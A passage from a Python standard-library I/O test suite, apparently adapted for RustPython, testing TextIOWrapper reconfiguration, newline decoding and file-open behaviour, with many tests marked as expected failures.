txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
        # but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_uninitialized(self):
super().test_uninitialized()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_non_text_encoding_codecs_are_rejected(self):
super().test_non_text_encoding_codecs_are_rejected()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repr(self):
super().test_repr()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoding_errors_reading(self):
super().test_encoding_errors_reading()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoding_errors_writing(self):
super().test_encoding_errors_writing()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines_input(self):
super().test_newlines_input()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines_output(self):
super().test_newlines_output()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_override_destructor(self):
super().test_override_destructor()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_one_by_one(self):
super().test_read_one_by_one()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_by_chunk(self):
super().test_read_by_chunk()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_1(self):
super().test_issue1395_1()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_2(self):
super().test_issue1395_2()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_3(self):
super().test_issue1395_3()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_4(self):
super().test_issue1395_4()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_5(self):
super().test_issue1395_5()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue2282(self):
super().test_issue2282()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_error_on_close(self):
super().test_close_error_on_close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonnormalized_close_error_on_close(self):
super().test_nonnormalized_close_error_on_close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_rawio(self):
super().test_rawio()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_rawio_write_through(self):
super().test_rawio_write_through()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_through(self):
super().test_reconfigure_write_through()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_illegal_decoder(self):
super().test_illegal_decoder()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_fromascii(self):
super().test_reconfigure_write_fromascii()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write(self):
super().test_reconfigure_write()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_non_seekable(self):
super().test_reconfigure_write_non_seekable()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_defaults(self):
super().test_reconfigure_defaults()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_newline(self):
super().test_reconfigure_newline()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_with_encoder_state(self):
super().test_seek_with_encoder_state()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_multibyte_seek_and_tell(self):
super().test_multibyte_seek_and_tell()
@unittest.skip("TODO: RUSTPYTHON, incremental decoder")
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
# XXX RUSTPYTHON: universal mode is deprecated anyway, so I
# feel fine about skipping it
# with support.check_warnings(('', DeprecationWarning)):
# f = self.open(support.TESTFN, "U")
# self.assertEqual(f.name, support.TESTFN)
# self.assertEqual(f.buffer.name, support.TESTFN)
# self.assertEqual(f.buffer.raw.name, support.TESTFN)
# self.assertEqual(f.mode, "U")
# self.assertEqual(f.buffer.mode, "rb")
# self.assertEqual(f.buffer.raw.mode, "rb")
# f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
@unittest.skip("TODO: RUSTPYTHON, check if fd is seekable fileio")
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
